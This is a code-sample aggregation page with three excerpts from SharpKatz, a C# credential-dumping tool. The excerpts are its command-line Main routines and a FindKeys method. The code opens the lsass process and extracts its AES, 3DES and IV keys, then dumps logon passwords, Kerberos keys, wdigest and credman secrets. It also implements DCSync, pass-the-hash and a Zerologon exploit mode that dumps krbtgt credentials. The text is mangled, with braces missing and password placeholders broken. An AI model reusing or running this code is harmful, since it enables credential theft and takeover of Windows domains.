Exemplo n.º 1
        public static void Main(string[] args)
            string command        = null;
            string user           = null;
            string guid           = null;
            string altservice     = null;
            string domain         = null;
            string dc             = null;
            string ntlmHash       = null;
            string aes128         = null;
            string aes256         = null;
            string rc4            = null;
            string binary         = null;
            string arguments      = null;
            string luid           = null;
            string impersonateStr = null;
            string authuser       = null;
            string authdomain     = null;
            string authpassword   = null;
            string forcentlmStr   = null;
            string mode           = null;
            string auth           = null;
            string target         = null;
            string machineaccount = null;
            string nullsessionStr = null;
            bool   showhelp       = false;

            OptionSet opts = new OptionSet()
                { "Command=", "--Command logonpasswords,ekeys,msv,kerberos,tspkg,credman,wdigest,dcsync", v => command = v },
                { "User="******"--User [user]", v => user = v },
                { "Guid=", "--Guid [guid]", v => guid = v },
                { "Domain=", "--Domain [domain]", v => domain = v },
                { "DomainController=", "--DomainController [domaincontroller]", v => dc = v },

                { "NtlmHash=", "--NtlmHash [ntlmHash]", v => ntlmHash = v },
                { "Aes128=", "--Aes128 [aes128]", v => aes128 = v },
                { "Aes256=", "--Aes256 [aes256]", v => aes256 = v },
                { "Rc4=", "--Rc4 [rc4]", v => rc4 = v },
                { "Binary=", "--Binary [binary]", v => binary = v },
                { "Arguments=", "--Arguments [arguments]", v => arguments = v },
                { "Luid=", "--Luid [luid]", v => luid = v },
                { "Impersonate=", "--Impersonate [impersonate]", v => impersonateStr = v },

                { "Mode=", "--Mode [mode]", v => mode = v },
                { "Auth=", "--Auth [auth]", v => auth = v },
                { "Target=", "--Target [target]", v => target = v },
                { "MachineAccount=", "--MachineAccount [machineaccount]", v => machineaccount = v },
                { "NullSession=", "--NullSession [nullsession]", v => nullsessionStr = v },

                { "AuthUser="******"--AuthUser [authuser]", v => authuser = v },
                { "AuthDomain=", "--AuthDomain [authdomain]", v => authdomain = v },
                { "AuthPassword="******"--AuthPassword [authpassword]", v => authpassword = v },
                { "ForceNtlm=", "--ForceNtlm [forcentlm]", v => forcentlmStr = v },

                { "Altservice=", "--Altservice [alternative service]", v => altservice = v },
                { "h|?|help", "Show available options", v => showhelp = v != null },

            catch (OptionException e)

            bool impersonate = false;

                if (!string.IsNullOrEmpty(impersonateStr))
                    impersonate = bool.Parse(impersonateStr);
            catch (OptionException e)

            bool forcentlm = false;

                if (!string.IsNullOrEmpty(forcentlmStr))
                    forcentlm = bool.Parse(forcentlmStr);
            catch (OptionException e)

            bool nullsession = false;

                if (!string.IsNullOrEmpty(nullsessionStr))
                    nullsession = bool.Parse(nullsessionStr);
            catch (OptionException e)

            if (showhelp)
                Console.WriteLine("[*] Example: SharpKatz.exe --Command logonpasswords");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command ekeys");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command msv");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command kerberos");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command tspkg");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command credman");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command wdigest");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes128 aes256");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local");


            if (string.IsNullOrEmpty(command))
                command = "logonpasswords";

            if (!command.Equals("logonpasswords") && !command.Equals("msv") && !command.Equals("kerberos") && !command.Equals("credman") &&
                !command.Equals("tspkg") && !command.Equals("wdigest") && !command.Equals("ekeys") && !command.Equals("dcsync") && !command.Equals("pth") && !command.Equals("zerologon"))
                Console.WriteLine("Unknown command");

            if (IntPtr.Size != 8)
                Console.WriteLine("Windows 32bit not supported");

            OSVersionHelper osHelper = new OSVersionHelper();


            if (osHelper.build <= 9600)
                Console.WriteLine("Unsupported OS Version");

            if (!command.Equals("dcsync") && !command.Equals("zerologon"))
                if (!Utility.IsElevated())
                    Console.WriteLine("Run in High integrity context");


                IntPtr  lsasrv    = IntPtr.Zero;
                IntPtr  wdigest   = IntPtr.Zero;
                IntPtr  lsassmsv1 = IntPtr.Zero;
                IntPtr  kerberos  = IntPtr.Zero;
                IntPtr  tspkg     = IntPtr.Zero;
                IntPtr  lsasslive = IntPtr.Zero;
                IntPtr  hProcess  = IntPtr.Zero;
                Process plsass    = Process.GetProcessesByName("lsass")[0];

                ProcessModuleCollection processModules = plsass.Modules;
                int modulefound = 0;

                for (int i = 0; i < processModules.Count && modulefound < 5; i++)
                    string lower = processModules[i].ModuleName.ToLowerInvariant();

                    if (lower.Contains("lsasrv.dll"))
                        lsasrv = processModules[i].BaseAddress;
                    else if (lower.Contains("wdigest.dll"))
                        wdigest = processModules[i].BaseAddress;
                    else if (lower.Contains("msv1_0.dll"))
                        lsassmsv1 = processModules[i].BaseAddress;
                    else if (lower.Contains("kerberos.dll"))
                        kerberos = processModules[i].BaseAddress;
                    else if (lower.Contains("tspkg.dll"))
                        tspkg = processModules[i].BaseAddress;

                hProcess = Natives.OpenProcess(Natives.ProcessAccessFlags.All, false, plsass.Id);

                Keys keys = new Keys(hProcess, lsasrv, osHelper);

                if (command.Equals("pth"))
                    if (string.IsNullOrEmpty(binary))
                        binary = "cmd.exe";

                    Module.Pth.CreateProcess(hProcess, lsasrv, kerberos, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), user, domain, ntlmHash, aes128, aes256, rc4, binary, arguments, luid, impersonate);
                    List <Logon> logonlist = new List <Logon>();

                    Module.LogonSessions.FindCredentials(hProcess, lsasrv, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                    if (command.Equals("logonpasswords") || command.Equals("msv"))
                        Module.Msv1.FindCredentials(hProcess, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                    if (command.Equals("logonpasswords") || command.Equals("credman"))
                        Module.CredMan.FindCredentials(hProcess, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                    if (command.Equals("logonpasswords") || command.Equals("tspkg"))
                        Module.Tspkg.FindCredentials(hProcess, tspkg, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                    if (command.Equals("logonpasswords") || command.Equals("kerberos") || command.Equals("ekeys"))
                        List <KerberosLogonItem> klogonlist = Module.Kerberos.FindCredentials(hProcess, kerberos, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                        if (command.Equals("logonpasswords") || command.Equals("kerberos"))
                            foreach (KerberosLogonItem l in klogonlist)
                                Module.Kerberos.GetCredentials(ref hProcess, l.LogonSessionBytes, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                        if (command.Equals("ekeys"))
                            foreach (KerberosLogonItem l in klogonlist)
                                Module.Kerberos.GetKerberosKeys(ref hProcess, l.LogonSessionBytes, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                    if (command.Equals("logonpasswords") || command.Equals("wdigest"))
                        Module.WDigest.FindCredentials(hProcess, wdigest, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                if (command.Equals("dcsync"))
                    if (string.IsNullOrEmpty(domain))
                        domain = Environment.GetEnvironmentVariable("USERDNSDOMAIN");
                    Console.WriteLine("[!] {0} will be the domain", domain);
                    if (string.IsNullOrEmpty(dc))
                        using (DirectoryEntry rootdse = new DirectoryEntry("LDAP://RootDSE"))
                            dc = (string)rootdse.Properties["dnshostname"].Value;
                    Console.WriteLine("[!] {0} will be the DC server", dc);
                    string alt_service = "ldap";
                    if (!string.IsNullOrEmpty(altservice))
                        alt_service = altservice;

                    if (!string.IsNullOrEmpty(guid))
                        Console.WriteLine("[!] {0} will be the Guid", guid);
                        Module.DCSync.FinCredential(domain, dc, guid: guid, altservice: alt_service, authuser: authuser, authdomain: authdomain, authpassword: authpassword, forcentlm: forcentlm);
                    else if (!string.IsNullOrEmpty(user))
                        Console.WriteLine("[!] {0} will be the user account", user);
                        Module.DCSync.FinCredential(domain, dc, user: user, altservice: alt_service, authuser: authuser, authdomain: authdomain, authpassword: authpassword, forcentlm: forcentlm);
                        Module.DCSync.FinCredential(domain, dc, altservice: alt_service, authuser: authuser, authdomain: authdomain, authpassword: authpassword, forcentlm: forcentlm, alldata: true);
                    if (string.IsNullOrEmpty(mode) || (!mode.Equals("check") && !mode.Equals("exploit") && !mode.Equals("auto")))
                        Console.WriteLine("[x] Missing or incorrect required parameter -> Mode");
                    else if (mode.Equals("auto") && (string.IsNullOrEmpty(domain) || string.IsNullOrEmpty(dc)))
                        Console.WriteLine("[x] Missing required parameter -> Domain or DomainController");
                    if (string.IsNullOrEmpty(target))
                        Console.WriteLine("[x] Missing or incorrect required parameter -> Target");

                    if (string.IsNullOrEmpty(machineaccount))
                        Console.WriteLine("[x] Missing or incorrect required parameter -> MachineAccount");

                    int authnSvc = Module.DCSync.RPC_C_AUTHN_NONE;

                    if (!string.IsNullOrEmpty(auth))
                        switch (auth)
                        case "noauth":
                            authnSvc = Module.DCSync.RPC_C_AUTHN_NONE;

                        case "ntlm":
                            authnSvc = Module.DCSync.RPC_C_AUTHN_WINNT;

                        case "kerberos":
                            authnSvc = Module.DCSync.RPC_C_AUTHN_GSS_KERBEROS;

                        case "negotiate":
                            authnSvc = Module.DCSync.RPC_C_AUTHN_GSS_NEGOTIATE;

                            Console.WriteLine("[!] Invalid Auth parameter value, use default -> AUTHN_NONE");
                            authnSvc = Module.DCSync.RPC_C_AUTHN_NONE;

                    bool success = Module.Zerologon.RunZerologon(mode, target, machineaccount, authnSvc, nullsession);

                    if (success == true)

                        if (mode.Equals("auto"))
                            Console.WriteLine("[!] {0} will be the domain", domain);
                            Console.WriteLine("[!] {0} will be the DC server", dc);

                            if (!string.IsNullOrEmpty(guid))
                                Console.WriteLine("[!] {0} will be the Guid", guid);
                                Module.DCSync.FinCredential(domain, dc, guid: guid, authuser: machineaccount, authdomain: domain, authpassword: "", forcentlm: true);
                            else if (!string.IsNullOrEmpty(user))
                                Console.WriteLine("[!] {0} will be the user account", user);
                                Module.DCSync.FinCredential(domain, dc, user: user, authuser: machineaccount, authdomain: domain, authpassword: "", forcentlm: true);
                                Module.DCSync.FinCredential(domain, dc, authuser: machineaccount, authdomain: domain, authpassword: "", forcentlm: true, alldata: true);
                        Console.WriteLine("[x] Attack failed. Target is probably patched.");
Exemplo n.º 2
        private int FindKeys(IntPtr hLsass, IntPtr lsasrvMem, OSVersionHelper oshelper)
            long keySigOffset = 0;
            long ivOffset = 0;
            long desOffset = 0, aesOffset = 0;
            KIWI_BCRYPT_HANDLE_KEY h3DesKey;
            KIWI_BCRYPT_HANDLE_KEY hAesKey;
            KIWI_BCRYPT_KEY81      extracted3DesKey, extractedAesKey;
            IntPtr keyPointer = IntPtr.Zero;

            // Search for AES/3Des/IV signature within lsasrv.dll and grab the offset
            keySigOffset = (long)Utility.OffsetFromSign("lsasrv.dll", oshelper.keyIVSig, max_search_size);
            if (keySigOffset == 0)
                Console.WriteLine("[x] Error: Could not find offset to AES/3Des/IV keys\n");

            // Retrieve offset to InitializationVector address due to "lea reg, [InitializationVector]" instruction
            IntPtr tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.IV_OFFSET);

            byte[] ivOffsetBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 4);
            ivOffset = BitConverter.ToInt32(ivOffsetBytes, 0);

            tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.IV_OFFSET + 4 + (int)ivOffset);

            // Read InitializationVector (16 bytes)
            this.iv = Utility.ReadFromLsass(ref hLsass, tmp_p, 16);

            tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.DES_OFFSET);

            // Retrieve offset to h3DesKey address due to "lea reg, [h3DesKey]" instruction
            byte[] desOffsetBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 4);
            desOffset = BitConverter.ToInt32(desOffsetBytes, 0);

            tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.DES_OFFSET + 4 + (int)desOffset);

            // Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
            byte[] keyPointerBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 8);
            long   keyPointerInt   = BitConverter.ToInt64(keyPointerBytes, 0);

            // Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
            byte[] h3DesKeyBytes = Utility.ReadFromLsass(ref hLsass, new IntPtr(keyPointerInt), Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY)));
            h3DesKey = Utility.ReadStruct <KIWI_BCRYPT_HANDLE_KEY>(h3DesKeyBytes);

            // Read in the 3DES key
            byte[] extracted3DesKeyByte = Utility.ReadFromLsass(ref hLsass, h3DesKey.key, Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81)));
            extracted3DesKey = Utility.ReadStruct <KIWI_BCRYPT_KEY81>(extracted3DesKeyByte);

            this.deskey = extracted3DesKey.hardkey.data;

            tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.AES_OFFSET);

            // Retrieve offset to hAesKey address due to "lea reg, [hAesKey]" instruction
            byte[] aesOffsetBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 4);
            aesOffset = BitConverter.ToUInt32(aesOffsetBytes, 0);

            tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.AES_OFFSET + 4 + (int)aesOffset);

            // Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
            keyPointerBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 8);
            keyPointerInt   = BitConverter.ToInt64(keyPointerBytes, 0);

            // Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
            byte[] hAesKeyBytes = Utility.ReadFromLsass(ref hLsass, new IntPtr(keyPointerInt), Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY)));
            hAesKey = Utility.ReadStruct <KIWI_BCRYPT_HANDLE_KEY>(hAesKeyBytes);

            // Read in AES key
            byte[] extractedAesKeyBytes = Utility.ReadFromLsass(ref hLsass, hAesKey.key, Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81)));
            extractedAesKey = Utility.ReadStruct <KIWI_BCRYPT_KEY81>(extractedAesKeyBytes);

            this.aeskey = extractedAesKey.hardkey.data;

Exemplo n.º 3
        public static void Main(string[] args)
            string command    = null;
            string user       = null;
            string guid       = null;
            string altservice = null;
            string domain     = null;
            string dc         = null;

            bool showhelp = false;

            OptionSet opts = new OptionSet()
                { "Command=", "--Command logonpasswords,ekeys,msv,kerberos,tspkg,credman,wdigest,dcsync", v => command = v },
                { "User="******"--User [user]", v => user = v },
                { "Guid=", "--Guid [guid]", v => guid = v },
                { "Domain=", "--Domain [domain]", v => domain = v },
                { "DomainController=", "--DomainController [domaincontroller]", v => dc = v },
                { "Altservice=", "--Altservice [alternative service]", v => altservice = v },
                { "h|?|help", "Show available options", v => showhelp = v != null },

            catch (OptionException e)

            if (showhelp)
                Console.WriteLine("[*] Example: SharpKatz.exe --Command logonpasswords");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command ekeys");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command msv");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command kerberos");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command tspkg");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command credman");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command wdigest");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc");
                Console.WriteLine("[*] Example: SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc");

            if (string.IsNullOrEmpty(command))
                command = "logonpasswords";

            if (!command.Equals("logonpasswords") && !command.Equals("msv") && !command.Equals("kerberos") && !command.Equals("credman") &&
                !command.Equals("tspkg") && !command.Equals("wdigest") && !command.Equals("ekeys") && !command.Equals("dcsync"))
                Console.WriteLine("Unknown command");

            if (IntPtr.Size != 8)
                Console.WriteLine("Windows 32bit not supported");

            OSVersionHelper osHelper = new OSVersionHelper();


            if (osHelper.build <= 9600)
                Console.WriteLine("Unsupported OS Version");

            if (!command.Equals("dcsync"))
                if (!Utility.IsElevated())
                    Console.WriteLine("Run in High integrity context");


                IntPtr  lsasrv    = IntPtr.Zero;
                IntPtr  wdigest   = IntPtr.Zero;
                IntPtr  lsassmsv1 = IntPtr.Zero;
                IntPtr  kerberos  = IntPtr.Zero;
                IntPtr  tspkg     = IntPtr.Zero;
                IntPtr  lsasslive = IntPtr.Zero;
                IntPtr  hProcess  = IntPtr.Zero;
                Process plsass    = Process.GetProcessesByName("lsass")[0];

                ProcessModuleCollection processModules = plsass.Modules;
                int modulefound = 0;

                for (int i = 0; i < processModules.Count && modulefound < 5; i++)
                    if (processModules[i].ModuleName.ToLower().Contains("lsasrv.dll"))
                        lsasrv = processModules[i].BaseAddress;
                    if (processModules[i].ModuleName.ToLower().Contains("wdigest.dll"))
                        wdigest = processModules[i].BaseAddress;
                    if (processModules[i].ModuleName.ToLower().Contains("msv1_0.dll"))
                        lsassmsv1 = processModules[i].BaseAddress;
                    if (processModules[i].ModuleName.ToLower().Contains("kerberos.dll"))
                        kerberos = processModules[i].BaseAddress;
                    if (processModules[i].ModuleName.ToLower().Contains("tspkg.dll"))
                        tspkg = processModules[i].BaseAddress;

                hProcess = Natives.OpenProcess(Natives.ProcessAccessFlags.All, false, plsass.Id);

                List <Logon> logonlist = new List <Logon>();

                Keys keys = new Keys(hProcess, lsasrv, osHelper);

                Module.LogonSessions.FindCredentials(hProcess, lsasrv, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                if (command.Equals("logonpasswords") || command.Equals("msv"))
                    Module.Msv1.FindCredentials(hProcess, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                if (command.Equals("logonpasswords") || command.Equals("credman"))
                    Module.CredMan.FindCredentials(hProcess, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                if (command.Equals("logonpasswords") || command.Equals("tspkg"))
                    Module.Tspkg.FindCredentials(hProcess, tspkg, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                if (command.Equals("logonpasswords") || command.Equals("kerberos") || command.Equals("ekeys"))
                    List <byte[]> klogonlist = Module.Kerberos.FindCredentials(hProcess, kerberos, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                    if (command.Equals("logonpasswords") || command.Equals("kerberos"))
                        foreach (byte[] p in klogonlist)
                            Module.Kerberos.GetCredentials(ref hProcess, p, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                    if (command.Equals("ekeys"))
                        foreach (byte[] p in klogonlist)
                            Module.Kerberos.GetKerberosKeys(ref hProcess, p, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                if (command.Equals("logonpasswords") || command.Equals("wdigest"))
                    Module.WDigest.FindCredentials(hProcess, wdigest, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), logonlist);

                if (string.IsNullOrEmpty(domain))
                    domain = Environment.GetEnvironmentVariable("USERDNSDOMAIN");
                Console.WriteLine("[!] {0} will be the domain", domain);
                if (string.IsNullOrEmpty(dc))
                    DirectoryEntry rootdse = new DirectoryEntry("LDAP://RootDSE");
                    dc = (string)rootdse.Properties["dnshostname"].Value;
                Console.WriteLine("[!] {0} will be the DC server", dc);
                string alt_service = "ldap";
                if (!string.IsNullOrEmpty(altservice))
                    alt_service = altservice;

                if (!string.IsNullOrEmpty(guid))
                    Console.WriteLine("[!] {0} will be the Guid", guid);
                    Module.DCSync.FinCredential(domain, dc, guid: guid, altservice: alt_service);
                else if (!string.IsNullOrEmpty(user))
                    Console.WriteLine("[!] {0} will be the user account", user);
                    Module.DCSync.FinCredential(domain, dc, user: user, altservice: alt_service);
                    Module.DCSync.FinCredential(domain, dc, altservice: alt_service, alldata: true);